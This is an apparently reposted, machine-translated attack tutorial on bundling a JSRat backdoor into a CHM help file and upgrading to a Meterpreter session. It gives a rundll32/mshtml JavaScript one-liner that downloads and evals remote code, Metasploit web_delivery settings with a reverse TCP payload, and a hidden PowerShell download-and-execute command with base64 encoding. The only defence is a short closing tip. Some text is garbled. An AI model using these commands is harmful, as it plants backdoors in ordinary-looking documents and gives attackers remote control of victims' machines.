CHM + Jsbackdoor Bundled backdoor

Source: Internet
Author: User

Jsrat server using interactive mode:

#!bashpython -i -p 8080

Access HTTP:// get the attack code as follows:

#!bashrundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

After many tests, the above command was successfully written to the CHM with the following HTML code:

#!html<!DOCTYPE html>

After compiling, the JS Interactive shell can be obtained successfully:

cmd /c commandThere is a black box for direct execution, and you can use run to avoid displaying black boxes. After the run is executed, the input is whoami > e:\1.txt then read to obtain the echo.

2. Get Meterpreter Session

This test gets the Meterpreter session by executing the PowerShell command, which is obtained directly, and automatically executes the PowerShell command after acquiring the client JS Interactive shell to get the Meterpreter session. Here's how:

To open MSF Web_delivery:

#!bash ~ MSFCONSOLE-LQMSF > Use exploit/multi/script/web_deliverymsf Exploit (web_delivery) > Set Target 2target =& Gt 2MSF exploit (Web_delivery) > Set payload windows/meterpreter/reverse_tcppayload = Windows/meterpreter/reverse_ TCPMSF exploit (web_delivery) > Set lhost = Exploit (web_delivery) > Set Lpor T 6666lport = 6666msf Exploit (web_delivery) > Set srvport 8081SRVPORT = 8081msf Exploit (web_delivery) > set Uripath/uripath =/msf Exploit (web_delivery) > exploit[*] exploit running as background job.msf exploit (web_delive ry) >[*] Started reverse TCP handler on[*] Using url:[*] Local ip:http://192.1 68.1.101:8081/[*] Server started. [*] Run the following command on the target machine:powershell.exe-nop-w hidden-c $n =new-object net.webclient; $n. proxy=[net . Webrequest]::getsystemwebproxy (); $n. Proxy.credentials=[net.credentialcache]::D efaultcredentials;iex $n. DownloaDstring (''); 

A client with PowerShell can obtain a Meterpreter session by executing the following command:

#!bashpowershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring(‘‘);

Due to the existence of special characters, we can encode the above code into Base64 format and save the following code to Power.txt

#!bash$n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring(‘‘);

Execute the following command:

#!bashcat power.txt | iconv --to-code UTF-16LE |base64

The final PowerShell command to be executed is:


To get a Meterpreter session directly using the Execute Command mode:


During the test, from running the CHM to getting Meterpreter, the client has no obvious exception, the whole black box pops up and gets to Meterpreter session such as:

So far I have not found any defensive posture, I know the small partners can share. The best is to improve personal safety awareness, for such documents, pay more attention to, try not to mess up, if not the main point, you can put into the virtual machine inside. Using Procexp.exe, you can see that a CHM file with a backdoor will open a new process.

CHM + Jsbackdoor Bundled backdoor

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.